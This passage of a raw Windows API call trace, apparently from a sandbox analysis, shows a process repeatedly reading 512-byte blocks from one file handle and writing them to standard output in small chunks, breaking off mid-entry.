[0193.078] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] GetFileType (hFile=0x50) returned 0x1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.078] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.078] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.078] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.078] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] GetFileType (hFile=0x50) returned 0x1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] GetFileType (hFile=0x50) returned 0x1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] GetFileType (hFile=0x50) returned 0x1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] GetFileType (hFile=0x50) returned 0x1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] GetFileType (hFile=0x50) returned 0x1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] GetFileType (hFile=0x50) returned 0x1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] GetFileType (hFile=0x50) returned 0x1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] GetFileType (hFile=0x50) returned 0x1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.079] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.079] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.079] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.079] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] GetFileType (hFile=0x50) returned 0x1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] GetFileType (hFile=0x50) returned 0x1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] GetFileType (hFile=0x50) returned 0x1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] GetFileType (hFile=0x50) returned 0x1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] GetFileType (hFile=0x50) returned 0x1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] GetFileType (hFile=0x50) returned 0x1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] GetFileType (hFile=0x50) returned 0x1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] GetFileType (hFile=0x50) returned 0x1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.080] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.080] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.080] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.080] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] GetFileType (hFile=0x50) returned 0x1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] GetFileType (hFile=0x50) returned 0x1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] GetFileType (hFile=0x50) returned 0x1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] GetFileType (hFile=0x50) returned 0x1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] GetFileType (hFile=0x50) returned 0x1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] GetFileType (hFile=0x50) returned 0x1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] GetFileType (hFile=0x50) returned 0x1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] GetFileType (hFile=0x50) returned 0x1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.081] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.081] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.081] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.081] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] GetFileType (hFile=0x50) returned 0x1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] GetFileType (hFile=0x50) returned 0x1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] GetFileType (hFile=0x50) returned 0x1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] GetFileType (hFile=0x50) returned 0x1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] GetFileType (hFile=0x50) returned 0x1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] GetFileType (hFile=0x50) returned 0x1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] GetFileType (hFile=0x50) returned 0x1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] GetFileType (hFile=0x50) returned 0x1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.082] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.082] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.082] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.082] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] GetFileType (hFile=0x50) returned 0x1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] GetFileType (hFile=0x50) returned 0x1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] GetFileType (hFile=0x50) returned 0x1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] GetFileType (hFile=0x50) returned 0x1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] GetFileType (hFile=0x50) returned 0x1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] GetFileType (hFile=0x50) returned 0x1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] GetFileType (hFile=0x50) returned 0x1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] GetFileType (hFile=0x50) returned 0x1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.083] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.083] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.083] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.083] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] GetFileType (hFile=0x50) returned 0x1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] GetFileType (hFile=0x50) returned 0x1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] GetFileType (hFile=0x50) returned 0x1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] GetFileType (hFile=0x50) returned 0x1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] GetFileType (hFile=0x50) returned 0x1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] GetFileType (hFile=0x50) returned 0x1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] GetFileType (hFile=0x50) returned 0x1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] GetFileType (hFile=0x50) returned 0x1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.084] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.084] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.084] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.084] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] GetFileType (hFile=0x50) returned 0x1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] GetFileType (hFile=0x50) returned 0x1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] GetFileType (hFile=0x50) returned 0x1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] GetFileType (hFile=0x50) returned 0x1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] GetFileType (hFile=0x50) returned 0x1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] GetFileType (hFile=0x50) returned 0x1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] GetFileType (hFile=0x50) returned 0x1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] GetFileType (hFile=0x50) returned 0x1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.085] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.085] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.085] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.085] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] GetFileType (hFile=0x50) returned 0x1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] GetFileType (hFile=0x50) returned 0x1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, 